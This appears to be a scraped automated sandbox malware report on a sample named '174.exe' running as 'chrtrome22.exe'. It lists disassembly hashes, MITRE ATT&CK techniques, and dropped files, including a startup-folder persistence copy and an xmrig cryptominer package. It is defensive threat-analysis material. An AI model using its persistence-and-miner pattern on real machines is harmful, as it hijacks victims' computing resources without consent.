Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17aefd3d8649f608c266973cff690f56c6669408b9c4caf347d570dcbe5235f4
Instruction ID: 8952186712a092350bd3aa623d80a8d2152d49175bab718d39ff5a63d83551e8
Opcode Fuzzy Hash: 17aefd3d8649f608c266973cff690f56c6669408b9c4caf347d570dcbe5235f4
Instruction Fuzzy Hash: 5101A221B0EA190FDB99E77C64A59B877D1EF9C20474501F9D008C729BDA69AC028782

Function 00007FFD9B8B4FF5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d74bb06f2a9e35a905521906b8370bf2250eb259c72acd0529f9f4b89cfade
Instruction ID: beb77d9c741d52c565bd070a82977b93e6462aa849dcb797691ff9d69a6bbccb
Opcode Fuzzy Hash: 64d74bb06f2a9e35a905521906b8370bf2250eb259c72acd0529f9f4b89cfade
Instruction Fuzzy Hash: BA01677121CB0C8FDB48EF0CE451AA5B7E0FB99364F10056EE58AC36A5D636E882CB45

Function 00007FFD9B8BA6CB Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2d377d6fbfb9a64d064d2bb7f31b1593d6af2b66a00d72ef0c01e75652fa97
Instruction ID: 37500f639fedbdd4e813532599111b5dd0364b49bca3e11dbf1571809767aada
Opcode Fuzzy Hash: 8a2d377d6fbfb9a64d064d2bb7f31b1593d6af2b66a00d72ef0c01e75652fa97
Instruction Fuzzy Hash: EBF04C37A4D96C57EB10A6A9EC204D877E5EF89364F06007EF41CC31E1EA365941C745

Function 00007FFD9B8B828D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f8ebc3ffa257554d515fcf2820f37fc109bdadcd95aeced594ea4f849ddd68
Instruction ID: 7bde27ff2672712d42ec9010570e4a5aa2353c1970eebcfc91bd8dbb27bcd78c
Opcode Fuzzy Hash: f8f8ebc3ffa257554d515fcf2820f37fc109bdadcd95aeced594ea4f849ddd68
Instruction Fuzzy Hash: 14F0223200D7844FD341DB28C8A1897BBE0EF89310F484AA9F085C72A2DA28F6418BC2

Function 00007FFD9B8B6BA0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b416a3990e131aa7e78ac694b9fb0426d62ae84c0ec9d7dfc25666d4ca141ae
Instruction ID: 12c433ef6f1ebf47cf82fc034c2cc287cfa57b864256cb61018b9c619eba6094
Opcode Fuzzy Hash: 1b416a3990e131aa7e78ac694b9fb0426d62ae84c0ec9d7dfc25666d4ca141ae
Instruction Fuzzy Hash: 2AF0EC31F1E83D16EBB857BC587463912C1DFCC51175D027DD40DC21A4FC1C698186C0

Function 00007FFD9B8B161B Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f45458b0e6339067e2c91fb179f2aa7a4b66a5faa9dd670b43ca8fa2bfd599
Instruction ID: 074f3168e2af5bf4fe6865c371e9aa6f7132c4aa0ac3db47f0bd5e3002be5caf
Opcode Fuzzy Hash: f7f45458b0e6339067e2c91fb179f2aa7a4b66a5faa9dd670b43ca8fa2bfd599
Instruction Fuzzy Hash: 68F0307461564D8FD744EF69C8446957791FB49304F5001A9E808C7392DA39E991CB91

Function 00007FFD9B8B6FED Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6ddf7ed5419fc5235f5d2c104f0f528d6dc9fa1f6d2e6760353816503463bc
Instruction ID: 1f3f6e19007065916a835369fad1f23d9b4443bffb3e3f5c13183647fabbc2a8
Opcode Fuzzy Hash: ba6ddf7ed5419fc5235f5d2c104f0f528d6dc9fa1f6d2e6760353816503463bc
Instruction Fuzzy Hash: 87D0A77371D7380DA72D13587C135FC6750D6462707010077D68A81053E602222345D6

Non-executed Functions

Function 00007FFD9B8B8375 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1803284113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b8b0000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c768b79dfb5da5af1a6e2e7450ebd19d84cf862ca6105eac0fddb2fef95c1686
Instruction ID: cb8ae91a1d0e3849fde21c37ad353d3641d04702e6222aaf9dcb8e8438b3de43
Opcode Fuzzy Hash: c768b79dfb5da5af1a6e2e7450ebd19d84cf862ca6105eac0fddb2fef95c1686
Instruction Fuzzy Hash: 47C13731F0DA590FE76CAB78A8626B577D1EF89300F1101BDE49DC32D7ED29A8438681

Analysis Process: chrtrome22.exePID: 5232, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B890BE5 Relevance: 1.7, APIs: 1, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNEL32 ref: 00007FFD9B890CBF

Memory Dump Source

Source File: 00000006.00000002.2106264106.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b890000_chrtrome22.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: a68891047b8adceb617733d808c50cd6917fc6ef19de50c788edba40639b75d6
Instruction ID: 8513f528991cc174c8650646339f14c882025c03bf862278c6a4ae63615b9c28
Opcode Fuzzy Hash: a68891047b8adceb617733d808c50cd6917fc6ef19de50c788edba40639b75d6
Instruction Fuzzy Hash: FA51F77050E7899FDB27877898145E5BFF0EF57320B0942EFC089CB4A3C658594AC7A2

Function 00007FFD9B970FA3 Relevance: .1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2112180619.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b970000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0d204b1cf37a0ee1f5e5b53d8875b4bfd5e5885538df56d329664bac070603
Instruction ID: 9375d1fc1fe50f1d0dfd802c5b6ff9f14c4d0b7bfd643ef5d2cb33c073c43cb0
Opcode Fuzzy Hash: 5d0d204b1cf37a0ee1f5e5b53d8875b4bfd5e5885538df56d329664bac070603
Instruction Fuzzy Hash: A6418722A0F7D55FE767977848B66643FB0EF53644B1A01EBD089CB0F3DA1829498312

Function 00007FFD9B970E79 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2112180619.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b970000_chrtrome22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7511c0a11527f90496ef9a7ef6d46318df75d33430d80d9a9a1837ef7f0ce50
Instruction ID: f8ef4af3ea86acace24f9ac620e4e15232297550de658570d1a2dc0dd324bbb4
Opcode Fuzzy Hash: c7511c0a11527f90496ef9a7ef6d46318df75d33430d80d9a9a1837ef7f0ce50
Instruction Fuzzy Hash: A0012D22F2E90E1FFBB8A36C64E657867C2EF84620B4905B5E15DC31A7EE19EC014241

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 174.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrtrome22.exe.log

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53de4dqd.zjo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4gfzxjv.uqs.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4iyul4z.mba.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjbj2pv4.zkb.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

C:\Users\user\Downloads\xmrig.zip

C:\xmrig\xmrig-6.22.2\SHA256SUMS

C:\xmrig\xmrig-6.22.2\WinRing0x64.sys

C:\xmrig\xmrig-6.22.2\benchmark_10M.cmd

C:\xmrig\xmrig-6.22.2\benchmark_1M.cmd

C:\xmrig\xmrig-6.22.2\config.json

C:\xmrig\xmrig-6.22.2\pool_mine_example.cmd

Windows Analysis Report
174.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre